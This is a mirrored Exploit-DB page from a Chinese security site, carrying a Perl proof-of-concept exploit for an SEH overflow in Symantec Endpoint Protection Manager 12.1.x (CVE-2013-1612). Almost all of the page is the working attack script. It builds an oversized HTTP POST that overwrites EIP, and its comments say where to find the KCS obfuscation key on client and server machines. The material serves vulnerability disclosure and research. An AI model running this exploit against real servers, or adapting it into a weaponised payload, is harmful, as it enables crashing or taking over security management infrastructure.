首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
来源:st3n@funoverip.net 作者:st3n 发布时间:2014-04-28  
## Exploit-DB mirror: http://www.exploit-db.com/sploits/33056-sepm-secars-poc-v0.3.tar.gz
  
#!/usr/bin/perl -w
# Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC
# Date: 31 January 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://http://www.symantec.com/en/uk/endpoint-protection
# Version: 12.1.0 -> 12.1.2
# Tested on: Windows 2003 Enterprise Edition SP2
# CVE : CVE-2013-1612
# More info on: http://funoverip.net/?p=1693
#
#=====================================================================================
#
# This POC code overwrite EIP with "CCCCCCCC"
#
# About KCS Key: That key is used to obfuscate traffic between client and server.
#                The key is generated during SEPM installation.
#                We need that key to talk with the SEPM server..
#
# Where to find KCS Key ? 
# On a managed client station. Search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more : 
#    C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
#    C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
#    CurrentVersion\\Data\\Config\\SyLink.xml 
#
# On server side, check the logs:
#    C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================
  
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
  
  
# SEP Manager host/ip
my $host        = "192.168.60.186";
my $port    = 8014;
  
# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";
  
# ---- config end -----
  
  
  
  
# flush after every write
$| = 1;
  
  
# Send HTTP request function
sub send_request {
        my $param = shift;      # URL parameters
        my $post_data = shift# POST DATA
        my $sock = IO::Socket::INET->new("$host:$port");
        if($sock){
                print "Connected.. \n";
  
                # HTTP request
                my $req =
                        "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
                        "User-Agent: Smc\r\n" .
                        "Host: $host\r\n" .
                        "Content-Length: " . length($post_data) . "\r\n" .
                        "\r\n" .
                        $post_data ;
  
                # Sending
                print $sock $req;
  
                # Read HTTP response
                my $resp = '';
                while(<$sock>){ $resp .=$_; }
  
                #print $resp;   
            if($resp =~ /400 Bad Request/) {
                    print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
                         
        }
      
        close $sock;
    }
  
}
  
  
# SEP object
my $sep = SEPM::SEPM->new();
  
  
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
  
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
  
# Obfuscate URL parameters 
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
  
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
         "foo=[hex]" .   # [hex] call the vulnerable parsing function
     "F" x 1288 .    # Junk
     "B" x 8 .       # Pointer to next SEH record
     "CCCCCCCC".     # SEH Handler, will overwrite EIP register 
     "D" x 500;      # Trigger "Memory Access Violation" exception
  
  
# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data        
);
  
  
print "[*] Done\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kolibri 2.0 GET Request - Stac
·Wireshark 1.8.12/1.10.5 wireta
·cFos Personal Net 3.09 Heap Co
·Mac OS X NFS Mount Privilege E
·JRuby Sandbox 0.2.2 Bypass
·GeoCore MAX DB 7.3.3 Blind SQL
·mRemote Offline Password Decry
·InfraRecorder 0.53 Unicode Buf
·Acunetix 8 Scanner Buffer Over
·NTP ntpd monlist Query Reflect
·Acunetix 8 build 20120704 - Re
·McAfee ePolicy Orchestrator 4.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved